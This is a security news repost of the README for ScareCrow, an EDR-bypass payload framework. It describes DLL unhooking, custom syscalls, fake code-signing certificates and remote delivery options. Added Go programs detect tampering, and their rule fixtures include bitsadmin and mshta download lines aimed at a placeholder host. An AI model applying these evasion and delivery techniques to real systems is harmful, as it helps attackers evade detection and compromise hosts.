ScareCrow - Payload Creation Framework Designed Around EDR Bypass


News category: IT Security News
Source: feedproxy.google.com


If you want to learn more about the techniques utilized in this framework, please take a look at Part 1 and Part 2.


Description

ScareCrow is a payload creation framework for generating loaders for the use of side loading (not injection) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR's hooks out of the system DLLs running in the process's memory. This works because we know the EDR's hooks are placed when a process is spawned. ScareCrow can target these DLLs and manipulate them in memory by using the API function VirtualProtect, which changes a section of a process' memory permissions to a different value, specifically from Execute-Read to Read-Write-Execute.

When executed, ScareCrow will copy the bytes of the system DLLs stored on disk in C:\Windows\System32\. These DLLs are stored on disk "clean" of EDR hooks because they are used by the system to load an unaltered copy into a new process when it is spawned. Since EDRs only hook these processes in memory, the on-disk copies remain unaltered. ScareCrow does not copy the entire DLL file; instead it focuses only on the .text section of the DLLs. This section of a DLL contains the executable assembly, and by doing this ScareCrow helps reduce the likelihood of detection, as re-reading entire files can cause an EDR to detect that there is a modification to a system resource. The data is then copied into the right region of memory by using each function's offset. Each function has an offset which denotes the exact number of bytes from the base address where it resides, providing the function's location on the stack. In order to do this, ScareCrow changes the permissions of the .text region of memory using VirtualProtect. Even though this is a system DLL, since it has been loaded into our process (that we control), we can change the memory permissions without requiring elevated privileges.
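The restore step described above is a byte-level comparison and overwrite of a loaded module's .text section against the copy on disk. Run the other way round, the same comparison is how a defender checks whether a loaded module's .text still matches a trusted baseline, and how an EDR's anti-tamper logic checks whether its own hooks are still in place. The following Go program is an added example written for this page, not ScareCrow's code: it diffs a baseline .text image against a live copy, reports each modified byte range, and attributes it to the export whose offset precedes it, using the per-function offsets the README describes. The section bytes, the export table and the names ExportA to ExportD are constructed for the example; a real monitor would take the baseline from the on-disk file (for instance via debug/pe) and the live bytes from the running process.

```go
package main

import (
	"fmt"
	"sort"
)

// Range is a half-open byte span [Start, End) inside the .text section.
type Range struct{ Start, End int }

// Finding attributes a modified range to the export whose offset is the
// largest one not above the range start, i.e. the function the bytes
// most likely belong to.
type Finding struct {
	Range  Range
	Export string
	Offset int // distance of the modification from the export's first byte
}

// DiffRanges returns every contiguous span where live differs from baseline.
// A length mismatch is reported as a trailing range, since a section that
// changed size is itself suspicious.
func DiffRanges(baseline, live []byte) []Range {
	n := len(baseline)
	if len(live) < n {
		n = len(live)
	}
	var out []Range
	start := -1
	for i := 0; i < n; i++ {
		if baseline[i] != live[i] {
			if start < 0 {
				start = i
			}
			continue
		}
		if start >= 0 {
			out = append(out, Range{start, i})
			start = -1
		}
	}
	if start >= 0 {
		out = append(out, Range{start, n})
	}
	if len(baseline) != len(live) {
		end := len(baseline)
		if len(live) > end {
			end = len(live)
		}
		out = append(out, Range{n, end})
	}
	return out
}

// Attribute maps each range to an export. exports maps an export name to
// its offset from the start of .text; the map need not be ordered.
func Attribute(ranges []Range, exports map[string]int) []Finding {
	names := make([]string, 0, len(exports))
	for n := range exports {
		names = append(names, n)
	}
	sort.Slice(names, func(i, j int) bool { return exports[names[i]] < exports[names[j]] })
	var out []Finding
	for _, r := range ranges {
		f := Finding{Range: r, Export: "<no export at or below offset>", Offset: r.Start}
		for _, n := range names {
			if exports[n] > r.Start {
				break
			}
			f.Export, f.Offset = n, r.Start-exports[n]
		}
		out = append(out, f)
	}
	return out
}

// Constructed sample (not real module data): a 64-byte "section" with four
// exports at 16-byte intervals. The live copy carries a 5-byte patch at the
// entry of the second export and one changed byte inside the fourth.
var SampleExports = map[string]int{
	"ExportA": 0x00, "NtProtectVirtualMemory": 0x10, "ExportC": 0x20, "ExportD": 0x30,
}

func SampleSection() (baseline, live []byte) {
	baseline = make([]byte, 64)
	for i := range baseline {
		baseline[i] = byte(i)
	}
	live = append([]byte(nil), baseline...)
	copy(live[0x10:], []byte{0xAA, 0xBB, 0xCC, 0xDD, 0xEE}) // prologue-sized patch at a function entry
	live[0x35] ^= 0xFF                                   // a single stray byte change mid-function
	return baseline, live
}

// Findings runs the comparison over the constructed sample.
func Findings() []Finding {
	baseline, live := SampleSection()
	return Attribute(DiffRanges(baseline, live), SampleExports)
}

func main() {
	for _, f := range Findings() {
		fmt.Printf("bytes %#x-%#x modified: %s+%d\n", f.Range.Start, f.Range.End, f.Export, f.Offset)
	}
}
```

Running it prints two findings: a 5-byte change at offset 0 of NtProtectVirtualMemory (the shape a prologue patch, or its removal, takes) and a single-byte change 5 bytes into ExportD. For a defender, divergence in either direction is the signal: bytes that should match the on-disk section but do not, or hook bytes that should be present but are gone.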

Once these hooks are removed, ScareCrow then utilizes custom System Calls to load and run shellcode in memory. ScareCrow does this even after the EDR hooks are removed to help avoid being detected by non-userland hook-based telemetry gathering tools such as Event Tracing for Windows (ETW) or other event logging mechanisms. These custom system calls are also used to perform the VirtualProtect call that removes the hooks placed by EDRs, described above, to avoid being detected by any EDR's anti-tamper controls. This is done by calling a custom version of the VirtualProtect syscall, NtProtectVirtualMemory. ScareCrow utilizes Golang to generate these loaders and assembly for these custom syscall functions.

ScareCrow loads the shellcode into memory by first decrypting the shellcode, which is encrypted by default using AES encryption with a decryption key and initialisation vector. Once decrypted and loaded, the shellcode is then executed. Depending on the loader options specified, ScareCrow will set up different export functions for the DLL. The loaded DLL also does not contain the standard DllMain function which all DLLs typically need to operate. The DLL will still execute without an issue because the process we load into will look for those export functions and not worry about DllMain being there.


Binary Sample

[image: After]

During the creation process of the loader, ScareCrow utilizes a library for blending into the background after a beacon calls home. This library does two things:

  • Code signs the Loader: Files that are signed with code signing certificates are often put under less scrutiny, making it easier for them to be executed without being challenged, as files signed by a trusted name are often less suspicious than others. Most antimalware products don't have the time to validate and verify these certificates (now some do, but typically the common vendor names are included in a whitelist). ScareCrow creates these certificates by using a Go package version of the tool limelighter to create a pfx12 file. This package takes a domain name, specified by the user, to create a code signing certificate for that domain. If needed, you can also use your own code signing certificate if you have one, using the valid command-line option.
  • Spoofs the attributes of the loader: This is done by using syso files, a form of embedded resource file that, when compiled along with our loader, modifies the attribute portion of the compiled code. Prior to generating a syso file, ScareCrow will generate a random file name (based on the loader type) to use. Once chosen, this file name will map to the associated attributes for that file name, ensuring that the right values are assigned.

File Attribute Sample

[image]

With these files and the Go code, ScareCrow will cross-compile them into DLLs using the c-shared library option. Once the DLL is compiled, it is obfuscated into a broken base64 string that will be embedded into a file. This allows the file to be remotely pulled, accessed, and programmatically executed.


Install

The first step as always is to clone the repo. Before you compile ScareCrow you'll need to install the dependencies.

To install them, run the following commands:

go get github.com/fatih/color
go get github.com/yeka/zip
go get github.com/josephspurrier/goversioninfo

Make sure that the following are installed on your OS:

openssl
osslsigncode
mingw-w64

Then build it:

go build ScareCrow.go

Help

./ScareCrow -h

_________ _________
/ _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
\_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
/ \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
/_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
\/ \/ \/ \/ \/
(@Tyl0us)
โ€œFear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.โ€

Usage of ./ScareCrow:
-I string
Path to the raw 64-bit shellcode.
-Loader string
Sets the type of process that will sideload the malicious payload:
[*] binary - Generates a binary based payload. (This type does not benfit from any sideloading)
[*] control - Loads a hidden control applet - the process name would be rundll32.
[*] dll - Generates just a DLL file. Can executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
[*] excel - Loads into a hidden Excel process.
[*] wscript - Loads into WScript process.
(default "dll")
-O string
Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.
-console
Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.
-delivery string
Generates a one-liner command to download and execute the payload remotely:
[*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader.
[*] hta - Generates a blank hta file containing the loader along with a MSHTA command to execute the loader remotely in the background.
[*] macro - Generates an Office macro that will download and execute the loader remotely.
-domain string
The domain name to use for creating a fake code signing cert. (e.g. Acme.com)
-password string
The password for code signing cert. Required when -valid is used.
-sandbox string
Enables sandbox evasion using IsDomainedJoined calls.
-url string
URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)
-valid string
The path to a valid code signing cert. Used instead of -domain if a valid code signing cert is desired.

Loader

The Loader determines the type of technique used to load the shellcode into the target system. If no Loader option is chosen, ScareCrow will just compile a standard DLL file that can be used by rundll32, regsvr32, or other techniques that utilize a DLL. ScareCrow utilizes three different types of loaders to load shellcode into memory:

  • Control Panel - This generates a control panel applet (i.e. Programs and Features, or AutoPlay). By compiling the loader to have specific DLL export functions in combination with the file extension .cpl, it will spawn a control panel process (rundll32.exe) and the loader will be loaded into memory.
  • WScript - Spawns a WScript process that utilizes a manifest file and registration-free COM techniques to side-by-side load (not inject) the DLL loader into its own process. This avoids registering the DLL in memory, as the manifest file tells the process which DLL to load, where it is, and what version it is.
  • Excel - Generates an XLL file (an Excel-based DLL) that, when loaded into Excel, will execute the loader. A hidden Excel process will be spawned, forcing the XLL file to be loaded.

ScareCrow can also generate binary-based payloads if needed by using the -loader command-line option. These binaries do not benefit from any side-by-side loading techniques but serve as an additional technique to execute shellcode depending on the situation.


Console

ScareCrow utilizes a technique to first create the process and then move it into the background. This does two things: first, it helps keep the process hidden, and second, it avoids being detected by any EDR product. Spawning a process right away in the background can be very suspicious and an indicator of maliciousness. ScareCrow does this by calling the 'GetConsoleWindow' and 'ShowWindow' Windows functions after the process is created and the EDR's hooks are loaded, and then changes the window's attributes to hidden. ScareCrow utilizes these APIs rather than the traditional -ldflags -H=windowsgui, as this is highly signatured and classified in most security products as an Indicator of Compromise.

If the -console command-line option is selected, ScareCrow will not hide the process in the background. Instead, ScareCrow will add several debug messages displaying what the loader is doing.


Delivery

The delivery command-line argument allows you to generate a command or string of code (in the macro case) to remotely pull the file from a remote source to the victim's host. These delivery methods include:

  • Bits - This will generate a bitsadmin command that will download the loader remotely, execute it and remove it.
  • HTA - This will generate a blank HTA file containing the loader. This option will also provide a command line that will execute the HTA remotely.
  • Macro - This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source, executed, and then removed.
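From the detection side, each of the loader and delivery options above leaves a process-creation artifact: bitsadmin or mshta started with a remote URL, or rundll32 launching a control-panel applet (.cpl). The following Go program is an added example for this page, not part of ScareCrow: it runs three such rules over constructed process-creation log lines (Sysmon-style Image and CommandLine fields in a made-up pipe-delimited format) and reports which lines match. The rule names, the log format, and the sample lines are all assumptions made for the example; none of them are ScareCrow output.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Rule is one detection: the process image it applies to and a pattern
// tested against that process's command line.
type Rule struct {
	Name    string
	Image   string         // lower-case image basename, e.g. "mshta.exe"
	Pattern *regexp.Regexp // case-insensitive, applied to the full command line
}

// Event is a minimal process-creation record (Sysmon Event ID 1 style).
type Event struct {
	Image       string
	CommandLine string
}

// Rules for the artifacts the README's options produce (rule names are made
// up for this example): bitsadmin or mshta pulling content from an http(s)
// URL, and rundll32 launching a control-panel applet. These LOLBins rarely
// fetch remote content in routine administration, so a hit is worth triage.
var Rules = []Rule{
	{"bitsadmin_remote_transfer", "bitsadmin.exe", regexp.MustCompile(`(?i)/transfer\b.*https?://`)},
	{"mshta_remote_url", "mshta.exe", regexp.MustCompile(`(?i)https?://`)},
	{"rundll32_cpl_applet", "rundll32.exe", regexp.MustCompile(`(?i)control_rundll|\.cpl\b`)},
}

// baseName normalises a full image path to its lower-case file name.
func baseName(image string) string {
	image = strings.ReplaceAll(image, "/", `\`)
	if i := strings.LastIndex(image, `\`); i >= 0 {
		image = image[i+1:]
	}
	return strings.ToLower(image)
}

// ParseEvent parses one constructed "Image=...|CommandLine=..." line.
// Values may contain '=', but not '|', in this toy format.
func ParseEvent(line string) (Event, error) {
	var ev Event
	for _, field := range strings.Split(line, "|") {
		kv := strings.SplitN(field, "=", 2)
		if len(kv) != 2 {
			return ev, fmt.Errorf("malformed field %q", field)
		}
		switch kv[0] {
		case "Image":
			ev.Image = kv[1]
		case "CommandLine":
			ev.CommandLine = kv[1]
		}
	}
	if ev.Image == "" {
		return ev, fmt.Errorf("no Image field in %q", line)
	}
	return ev, nil
}

// Match returns the names of every rule the event triggers.
func Match(ev Event) []string {
	var hits []string
	img := baseName(ev.Image)
	for _, r := range Rules {
		if img == r.Image && r.Pattern.MatchString(ev.CommandLine) {
			hits = append(hits, r.Name)
		}
	}
	return hits
}

// Scan runs every rule over a batch of log lines and maps each flagged
// line index to the rules it triggered; malformed lines are skipped.
func Scan(lines []string) map[int][]string {
	out := map[int][]string{}
	for i, l := range lines {
		ev, err := ParseEvent(l)
		if err != nil {
			continue
		}
		if hits := Match(ev); len(hits) > 0 {
			out[i] = hits
		}
	}
	return out
}

// SampleLines are constructed for this example; they are not real telemetry.
// Lines 0-2 should fire, lines 3-4 are benign uses of the same binaries.
var SampleLines = []string{
	`Image=C:\Windows\System32\bitsadmin.exe|CommandLine=bitsadmin /transfer job /download /priority high https://example.invalid/x.dll C:\Users\Public\x.dll`,
	`Image=C:\Windows\System32\mshta.exe|CommandLine=mshta https://example.invalid/loader.hta`,
	`Image=C:\Windows\System32\rundll32.exe|CommandLine=rundll32 shell32.dll,Control_RunDLL C:\Users\Public\applet.cpl`,
	`Image=C:\Windows\System32\bitsadmin.exe|CommandLine=bitsadmin /list /allusers`,
	`Image=C:\Windows\System32\rundll32.exe|CommandLine=rundll32 printui.dll,PrintUIEntry /in /n \\srv\p1`,
}

func main() {
	for i, hits := range Scan(SampleLines) {
		fmt.Printf("line %d flagged: %v\n", i, hits)
	}
}
```

Rules are keyed on the image name as well as the command line so that a URL in, say, a browser's command line does not trigger the mshta rule. In production these patterns would be expressed in the detection engine's own rule language and paired with parent-process context (Office or script hosts spawning the LOLBin), which is what separates the delivery chain above from an administrator's one-off use.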

To Do
  • Currently only supports x64 payloads
  • Some older versions of the Windows OS (i.e. Windows 7 or Windows 8.1) have issues reloading the system DLLs; as a result, a version check is built in to ensure stability

Credit
  • Special thanks to the artist, Luciano Buonamici for the artwork
  • Special thanks to josephspurrier for his repo

